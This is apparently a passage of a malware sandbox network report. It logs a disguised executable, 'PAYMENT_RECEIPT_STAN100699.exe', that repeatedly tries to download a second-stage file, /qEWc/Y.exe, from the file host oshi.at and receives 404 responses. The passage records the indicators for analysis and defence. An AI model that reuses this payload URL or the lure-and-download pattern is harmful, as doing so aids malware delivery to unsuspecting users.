Nov 1, 2023 08:30:36.718674898 CET	49768	443	192.168.2.4	5.253.86.15

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 1, 2023 08:26:37.344357014 CET	50037	53	192.168.2.4	1.1.1.1
Nov 1, 2023 08:26:37.527219057 CET	53	50037	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 1, 2023 08:26:37.344357014 CET	192.168.2.4	1.1.1.1	0xed3e	Standard query (0)	oshi.at	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 1, 2023 08:26:37.527219057 CET	1.1.1.1	192.168.2.4	0xed3e	No error (0)	oshi.at		5.253.86.15	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

oshi.at

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49741	5.253.86.15	443	C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe

Timestamp	Direction	Data
2023-11-01 07:26:38 UTC	OUT	GET /qEWc/Y.exe HTTP/1.1 Host: oshi.at Connection: Keep-Alive
2023-11-01 07:26:39 UTC	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 01 Nov 2023 07:26:39 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 1849 Connection: close
2023-11-01 07:26:39 UTC	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70 Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49742	5.253.86.15	443	C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-01 07:26:44 UTC	2	OUT	GET /qEWc/Y.exe HTTP/1.1 Host: oshi.at
2023-11-01 07:26:47 UTC	2	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 01 Nov 2023 07:26:47 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 1849 Connection: close
2023-11-01 07:26:47 UTC	2	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70 Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.4	49754	5.253.86.15	443	C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-01 07:27:57 UTC	20	OUT	GET /qEWc/Y.exe HTTP/1.1 Host: oshi.at Connection: Keep-Alive
2023-11-01 07:27:59 UTC	20	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 01 Nov 2023 07:27:59 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 1849 Connection: close
2023-11-01 07:27:59 UTC	20	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70 Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.4	49755	5.253.86.15	443	C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-01 07:28:04 UTC	22	OUT	GET /qEWc/Y.exe HTTP/1.1 Host: oshi.at Connection: Keep-Alive
2023-11-01 07:28:13 UTC	22	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 01 Nov 2023 07:28:13 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 1849 Connection: close
2023-11-01 07:28:13 UTC	22	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70 Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.4	49756	5.253.86.15	443	C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-01 07:28:18 UTC	24	OUT	GET /qEWc/Y.exe HTTP/1.1 Host: oshi.at Connection: Keep-Alive
2023-11-01 07:28:20 UTC	24	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 01 Nov 2023 07:28:20 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 1849 Connection: close
2023-11-01 07:28:20 UTC	24	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70 Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.4	49757	5.253.86.15	443	C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-01 07:28:26 UTC	26	OUT	GET /qEWc/Y.exe HTTP/1.1 Host: oshi.at Connection: Keep-Alive
2023-11-01 07:28:35 UTC	26	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 01 Nov 2023 07:28:35 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 1849 Connection: close
2023-11-01 07:28:35 UTC	26	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70 Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.4	49758	5.253.86.15	443	C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-01 07:28:40 UTC	28	OUT	GET /qEWc/Y.exe HTTP/1.1 Host: oshi.at Connection: Keep-Alive
2023-11-01 07:28:43 UTC	28	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 01 Nov 2023 07:28:43 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 1849 Connection: close
2023-11-01 07:28:43 UTC	28	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70 Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.4	49759	5.253.86.15	443	C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-01 07:28:49 UTC	30	OUT	GET /qEWc/Y.exe HTTP/1.1 Host: oshi.at Connection: Keep-Alive
2023-11-01 07:29:04 UTC	30	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 01 Nov 2023 07:29:04 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 1849 Connection: close
2023-11-01 07:29:04 UTC	30	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70 Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.4	49760	5.253.86.15	443	C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-01 07:29:10 UTC	32	OUT	GET /qEWc/Y.exe HTTP/1.1 Host: oshi.at Connection: Keep-Alive
2023-11-01 07:29:12 UTC	32	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 01 Nov 2023 07:29:12 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 1849 Connection: close
2023-11-01 07:29:12 UTC	32	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70 Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.4	49761	5.253.86.15	443	C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-01 07:29:17 UTC	34	OUT	GET /qEWc/Y.exe HTTP/1.1 Host: oshi.at Connection: Keep-Alive
2023-11-01 07:29:24 UTC	34	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 01 Nov 2023 07:29:24 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 1849 Connection: close
2023-11-01 07:29:24 UTC	34	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70 Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.4	49762	5.253.86.15	443	C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-01 07:29:30 UTC	36	OUT	GET /qEWc/Y.exe HTTP/1.1 Host: oshi.at
2023-11-01 07:29:31 UTC	36	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 01 Nov 2023 07:29:31 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 1849 Connection: close
2023-11-01 07:29:31 UTC	36	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70 Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.4	49763	5.253.86.15	443	C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-01 07:29:37 UTC	38	OUT	GET /qEWc/Y.exe HTTP/1.1 Host: oshi.at Connection: Keep-Alive
2023-11-01 07:29:43 UTC	38	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 01 Nov 2023 07:29:43 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 1849 Connection: close
2023-11-01 07:29:43 UTC	38	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70 Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49744	5.253.86.15	443	C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-01 07:26:52 UTC	4	OUT	GET /qEWc/Y.exe HTTP/1.1 Host: oshi.at
2023-11-01 07:26:56 UTC	4	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 01 Nov 2023 07:26:56 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 1849 Connection: close
2023-11-01 07:26:56 UTC	4	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70 Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.4	49764	5.253.86.15	443	C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-01 07:29:49 UTC	40	OUT	GET /qEWc/Y.exe HTTP/1.1 Host: oshi.at
2023-11-01 07:29:49 UTC	40	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 01 Nov 2023 07:29:49 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 1849 Connection: close
2023-11-01 07:29:49 UTC	40	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70 Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.2.4	49765	5.253.86.15	443	C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-01 07:29:55 UTC	42	OUT	GET /qEWc/Y.exe HTTP/1.1 Host: oshi.at Connection: Keep-Alive
2023-11-01 07:30:00 UTC	42	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 01 Nov 2023 07:29:59 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 1849 Connection: close
